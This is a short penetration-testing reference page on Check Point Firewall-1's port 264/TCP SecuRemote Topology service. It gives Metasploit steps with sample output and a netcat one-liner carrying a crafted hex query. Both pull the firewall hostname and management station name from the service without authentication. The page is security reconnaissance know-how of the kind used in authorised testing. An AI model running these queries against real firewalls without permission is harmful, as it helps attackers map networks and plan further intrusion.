Check Point Firewall - Port 264

Become VeryLazyTech member! 🎁

Basic info

CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port 264/TCP to obtain critical details using publicly available tools and commands.

CheckPoint Firewall-1 includes a SecuRemote Topology service running on port 264/TCP, which allows unauthenticated queries. By interacting with this service, attackers can retrieve the firewall's hostname and the SmartCenter management station's name—potentially leading to further attacks.

The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.


Exploiting CheckPoint Firewall-1 with Metasploit

Metasploit provides a module that can interact with the firewall to extract its hostname and management station name.

Step 1: Load the Metasploit Module

Open Metasploit and load the auxiliary module:

use auxiliary/gather/checkpoint_hostname

Step 2: Set Target IP Address

Set the RHOST parameter to the target CheckPoint Firewall-1 instance:

set RHOST 10.10.10.10

Step 3: Execute the Module

Run the module to interact with the firewall:

run

If the firewall is vulnerable, the module will successfully contact the SecuRemote Topology service and return output similar to:

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

This confirms the presence of the firewall and exposes its internal naming conventions.


Alternative Method: Extracting Hostname and ICA Name Manually

If Metasploit is unavailable, a direct Netcat command can be used to query the firewall:

Step 1: Send Query via Netcat

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-

Step 2: Analyze the Output

A successful query returns the firewall’s certificate name (CN) and organization (O):

CN=Panama,O=MGMTT.srv.rxfrmi

These values can be used to gain insights into the firewall’s identity and administrative domains.


Last updated

Was this helpful?